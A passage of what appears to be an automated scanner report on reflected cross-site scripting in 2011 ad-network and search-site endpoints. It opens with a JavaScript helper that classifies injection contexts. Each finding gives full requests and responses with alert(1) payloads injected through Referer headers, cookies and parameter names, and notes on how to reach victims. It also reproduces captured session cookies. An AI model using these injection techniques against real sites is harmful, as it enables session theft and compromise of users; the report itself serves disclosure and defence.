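// for responses served as JavaScript (Content-Type: text/javascript): there the
// whole body is code and any HTML inside it is only a nested string value.
function classifySink(body, payload, isScriptResource = false) {
  const at = body.indexOf(payload);
  if (at === -1) return 'not reflected';
  const before = body.slice(0, at);
  const lower = before.toLowerCase();

  // Inside inline script when the most recent <script opening is unclosed.
  const lastOpen = lower.lastIndexOf('<script');
  const lastClose = lower.lastIndexOf('</script');
  const inScript = isScriptResource || (lastOpen !== -1 && lastOpen > lastClose);

  // Quote state is tracked from the script start, or from the last tag start.
  const boundary = isScriptResource ? 0 : Math.max(0, inScript ? lastOpen : before.lastIndexOf('<'));
  const quote = openQuote(before.slice(boundary), inScript);

  if (inScript) return quote ? `JavaScript string (${quote}-quoted)` : 'JavaScript code';
  if (before.lastIndexOf('<') > before.lastIndexOf('>')) {
    return quote ? `HTML attribute (${quote}-quoted)` : 'HTML tag (unquoted)';
  }
  return 'HTML text between tags';
}

// Constructed, shortened versions of the captured responses.
const CANONICAL_BODY =
  '<html><head>\n<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp" />\n</head></html>';
const ADMELD_BODY =
  '<html><head><script type="text/javascript">\nnumAdsFromAdmeld =0;\njQuery(window).load(function (){\n' +
  'showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_18734116f";alert(1)//fe68ef9022c/x26amp",admeld_site);\n</script>';
const BIZO_BODY = 'Unknown Referer: 4519c<script>alert(1)</script>988454ab8a6';
const ADNXS_BODY =
  "document.write('<iframe frameborder=\"0\" src=\"http://ib.adnxs.com/if?referrer=http://www.google.com/search%3Fhl=en%26q=6dd58'-alert(1)-'8a44710014e\">');";

console.log(classifySink(CANONICAL_BODY, '76672"><script>alert(1)</script>960fa931a3c'));
console.log(classifySink(ADMELD_BODY, '4116f";alert(1)//fe68ef9022c'));
console.log(classifySink(BIZO_BODY, '4519c<script>alert(1)</script>988454ab8a6'));
console.log(classifySink(ADNXS_BODY, "6dd58'-alert(1)-'8a44710014e", true));
```

The 3.509 body shows why the Content-Type matters: the payload sits inside an HTML attribute that is itself inside a single-quoted string passed to document.write, and because the response is a script resource the outer context is the one that counts, which is what the report states for that finding.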

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 4519c<script>alert(1)</script>988454ab8a6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 19 Apr 2011 16:09:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 4519c<script>alert(1)</script>988454ab8a6

3.508. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab0fd"-alert(1)-"d8714f56330 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. Two points temper that: this response is a script resource (Content-Type: text/javascript) loaded by third-party pages, so injected code executes in the origin of the page that includes it and the Referer of such a request is the URL of the including page; and the reflected value is also concatenated into the src of a second script (GetInvite2.aspx), so the same input reaches that endpoint's referer parameter.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=177784&siteID=glamcom&creativeID=1467968&placementID=1248525&adexpansion=0&click=0 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: ab0fd"-alert(1)-"d8714f56330
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 615
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2648=178074,178074; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178074=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2648=4%2f20%2f2011+9%3a42%3a49+PM; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2648=2; domain=.insightexpressai.com; expires=Wed, 20-Apr-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Thu, 21 Apr 2011 01:57:31 GMT
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:57:31 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='fun
...[SNIP]...
InviteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=178074&referer=ab0fd"-alert(1)-"d8714f56330&adexpansion=0&siteID=glamcom&placementID=1248525&click=0&creativeID=1467968";document.getElementsByTagName('head')[0].appendChild(s);}})();

3.509. http://ib.adnxs.com/ttj [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd58'-alert(1)-'8a44710014e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the payload here sits in the query string of a search URL in the Referer: a browser fills this header from the URL of the page that loaded the resource, so whoever controls that page's URL controls part of the header, subject to how the browser percent-encodes characters such as quotes when it serialises the Referer.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=396985&pubclick=http://xads.zedo.com/ads2/c%3Fa%3D895737%3Bx%3D2304%3Bg%3D172%3Bc%3D305005852%2C305005852%3Bi%3D0%3Bn%3D305%3Bi%3D0%3Bu%3DjhmxpQoBADYAAET@BzgAAAAW%7E022111%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D421%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.2778043581638485%3Bp%3D8%3Bf%3D1093076%3Bh%3D1093075%3Bo%3D20%3By%3D331%3Bv%3D1%3Bt%3Di%3Bk= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6dd58'-alert(1)-'8a44710014e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI93oQChgBIAEoATD7w4vrBBD7w4vrBBgA; uuid2=4470455573253905340; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6WIpbjn!e5'S.ASR/7l([H.cpVGe8tPtQ-y5#we@ie65CB#S!9Y^vP[KF^P'%_EYX5)gWYmv-[1%xvmrNHt.[<D(7u)aj^!iH1rT^=*7C^Bjc%C9:V]:>i#xK^@g2k_woCAWF@?sM.MP<1ic[d6CGz9%wPyKtR:Oy7D34Qm3(6eds:*nw[M7fUB%t6ySwO$b4u(JNrEJOXfpGHm(!<YP8ub*=t

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 24-Feb-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIr7gCEAoYASABKAEws4KW6wQQs4KW6wQYAA..; path=/; expires=Tue, 24-May-2011 21:50:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 23 Feb 2011 21:50:43 GMT
Content-Length: 1050

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=eNFXkGYssj940VeQZiyyPwAAAMDMzPw_eNFXkGY
...[SNIP]...
%28%27r%27%2C+202232%2C+1298497843%29%3B&cnd=!gBqf3QiyggMQ-KsMGAAg8fgCKAAxeNFXkGYssj9CEwgAEAAYACABKP7__________wFCDQjIPhD2bhibEyACKAVIA1AAWP4DYANo5gI.&referrer=http://www.google.com/search%3Fhl=en%26q=6dd58'-alert(1)-'8a44710014e">
...[SNIP]...

3.510. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 519b1"-alert(1)-"9a5bdb36e23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:10 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EB5FA52EB4321C340AE3FB80FA0E3631; Path=/
Connection: keep-alive
Content-Length: 8363


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=519b1"-alert(1)-"9a5bdb36e23",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "fa
...[SNIP]...

3.511. http://a.collective-media.net/cmadj/manta.comp/energy_resources [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aae1"%3balert(1)//9f276e0ea99 was submitted in the cli cookie. This input was echoed as 6aae1";alert(1)//9f276e0ea99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. In practice that usually means another injection on any host under the cookie's domain (a cookie scoped to the parent domain, as the Set-Cookie headers below are for collective-media.net, can be set by any subdomain), or a network-position attacker adding a Set-Cookie header to a plaintext HTTP response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac76aae1"%3balert(1)//9f276e0ea99; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:23 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:23 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:23 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:23 GMT
Content-Length: 8118

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11e4f07c0988ac76aae1";alert(1)//9f276e0ea99&seg_code=noseg&ord=1298679563",true);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&reppipe=,&edr=off&repequal=_&ru=http%3A%2F%2Fa.collective-media.net%2Fdatapair%
...[SNIP]...

3.512. http://blekko.com/join [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /join

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360f1"><script>alert(1)</script>49dd0235738 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /join?360f1"><script>alert(1)</script>49dd0235738=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Apr 2011 16:01:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 113
Location: https://blekko.com/join?360f1"><script>alert(1)</script>49dd0235738=1
X-Blekko-PT: eeda6c0826ee544726ecc89b0c43b4dd

The document has moved <a href="https://blekko.com/join?360f1"><script>alert(1)</script>49dd0235738=1">here</a>.

3.513. http://blekko.com/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blekko.com
Path:   /login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a31"><script>alert(1)</script>120b30675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /login?71a31"><script>alert(1)</script>120b30675c=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Apr 2011 16:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 113
Location: https://blekko.com/login?71a31"><script>alert(1)</script>120b30675c=1
X-Blekko-PT: 2758bb8e72becdda20b423bab514421e

The document has moved <a href="https://blekko.com/login?71a31"><script>alert(1)</script>120b30675c=1">here</a>.

3.514. http://d.chango.com/collector/admeldpixel [_t cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.chango.com
Path:   /collector/admeldpixel

Issue detail

The value of the _t cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 180aa'-alert(1)-'2b99ebe76a7 was submitted in the _t cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/admeldpixel?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe180aa'-alert(1)-'2b99ebe76a7; _i_cw=1

Response

HTTP/1.1 200 OK
Content-Length: 155
Server: Chango RTB Server
Etag: "f24a679f59908bd93657366d15575ed95b176a03"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe180aa'-alert(1)-'2b99ebe76a7; Domain=chango.com; expires=Sun, 18 Apr 2021 01:29:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 05 Jun 2011 01:29:35 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe180aa'-alert(1)-'2b99ebe76a7';

3.515. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 85e58<script>alert(1)</script>0dca2365492 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?fpc=c428de2-12e59391fd7-2d50293c-2&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 24 Feb 2011 19:50:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1195


           <html>
           <head><title>ShareThis Segmenter</title></head>
           <body>
           
           No Segment
           <script type="text/javascript">
                   var ref=document.referrer;var lurl = (("https:" == document.location.p
...[SNIP]...
<div style='display:none'>clicookie:CszLBk1bK3ITLgrkJKQWAg==85e58<script>alert(1)</script>0dca2365492
userid:
</div>
...[SNIP]...

3.516. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/160x600/367631667

Issue detail

The value of the meld_sess cookie is copied into the HTML document as plain text between tags. The payload b4964<script>alert(1)</script>e017567acbc was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/json/100/glammedia/160x600/367631667?url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD76212205993 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9b4964<script>alert(1)</script>e017567acbc; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1539
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:29:00 GMT
Connection: close

GlamAdmeldRenderJsAd({"ad":{"id":2050359,"adProviderId":2,"adProviderName":"collective","width":160,"height":600,"container":"ADMELD76212205993","bid":0.84,"requestId":"72925041-75d7-4786-811c-f7ab413
...[SNIP]...
=\"600\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" border=\"0\" scrolling=\"no\" src=\"http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9b4964<script>alert(1)</script>e017567acbc/72925041-75d7-4786-811c-f7ab4132c6b3?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349340\">
...[SNIP]...

3.517. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/json/100/glammedia/728x90/367631667

Issue detail

The value of the meld_sess cookie is copied into the HTML document as plain text between tags. The payload 9a684<script>alert(1)</script>c62a7d5c400 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/json/100/glammedia/728x90/367631667?01AD=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g&01RI=035843F03C56E88&01NA=&url=http%3A//poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/&callback=GlamAdmeldRenderJsAd&floor_price=0.70&container=ADMELD6529836193 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb99a684<script>alert(1)</script>c62a7d5c400; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1541
Content-Type: application/javascript
Date: Thu, 21 Apr 2011 01:28:06 GMT
Connection: close
Set-Cookie: D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; expires=Thu, 19-May-2011 01:28:06 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GlamAdmeldRenderJsAd({"ad":{"id":4871181,"adProviderId":693,"adProviderName":"glamcontextweb","width":728,"height":90,"container":"ADMELD6529836193","bid":1.16,"requestId":"8f9ed826-a9e1-47ee-862c-5c1
...[SNIP]...
ht=\"90\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" border=\"0\" scrolling=\"no\" src=\"http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb99a684<script>alert(1)</script>c62a7d5c400/8f9ed826-a9e1-47ee-862c-5c19e908f2c5?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349286\">
...[SNIP]...
